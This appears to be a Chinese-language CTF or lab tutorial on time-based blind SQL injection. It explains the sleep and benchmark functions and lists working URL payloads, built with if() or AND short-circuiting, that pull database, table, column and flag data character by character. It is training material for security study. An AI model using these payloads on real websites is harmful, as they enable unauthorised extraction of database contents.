一、sql基础
sleep
benchmark
二、延时盲注
简介
练习
payload
猜库名长度
id=1 and if((length(database())=3),sleep(5),0)%23
我们发现这个payload和我们之前的布尔盲注非常像,就在返回结果那加了延时,如果我们猜的长度正确的话,那么我们直接开始练习:
猜测注入点
这次的注入点我们通过之前的四种方式返回的结果都一样:
id=1 显示hello
id=1' 显示hello
id=1'%23 显示hello
id=1 %23 显示hello
那么我们就需要另一种方式测试注入点是字符型还是数字型:
id=1 and sleep(5)%23 有延时
id=1' and sleep(5)%23 没有延时
测试出没有引号的有延时那么就是数字型:
开始猜长度,我们猜1,服务器直接返回了数据,说明长度不对,我们改成3试试:
发现有一段空白的等待时间,过了一会才返回的数据,说明猜对了,长度就是3:
猜库名的payload也是和布尔盲注类似,只是多了一个延时函数,下面我就不延时,直接放payload:
猜库名长度
id=1 and if((length(database())=3),sleep(5),0)%23
猜库名
id=1 and if((ascii(substr((select database()),1,1))=118),sleep(5),0)%23
猜表名长度
id=1 and if((select length(group_concat(table_name)) from information_schema.tables where table_schema=database())=8,sleep(5),0)%23
猜表名
id=1 and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=118),sleep(5),0)%23
猜列名长度
id=1 and if((select length(group_concat(column_name)) from information_schema.columns where table_name='flag')=7,sleep(5),0)%23
猜列名
id=1 and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))=118),sleep(5),0)%23
猜数据长度
id=1 and if(((select length(flag) from flag)=38),sleep(5),0)%23
猜数据
id=1 and if((ascii(substr((select flag from flag),1,1))=102),sleep(5),0)%23
and断路特性
and断路特性
select 1<2 and sleep(5);
select 1>2 and sleep(5);
猜库名长度
id=1 and length(database())=3 and sleep(5)%23
猜库名
id=1 and ascii(substr((select database()),1,1))=119 and sleep(5)%23
猜表名长度
id=1 and (select length(group_concat(table_name)) from information_schema.tables where table_schema=database())=9 and sleep(5)%23
猜表名
id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=102 and sleep(5)%23
猜列名长度
id=1 and (select length(group_concat(column_name)) from information_schema.columns where table_name='flag')=4 and sleep(5)%23
猜列名
id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))=102 and sleep(5)%23
猜数据长度
id=1 and (select length(flag) from flag)=38 and sleep(5)%23
id=1 and ascii(substr((select flag from flag),1,1))=102 and sleep(5)%23
sleep函数本身的作用就是产生延时,而benchmark函数是需要执行多次表达式产生延时
可以通过if函数进行条件判断,然后选择执行那条语句
当if被过滤时可以利用and的断路特性,使用多个and构造payload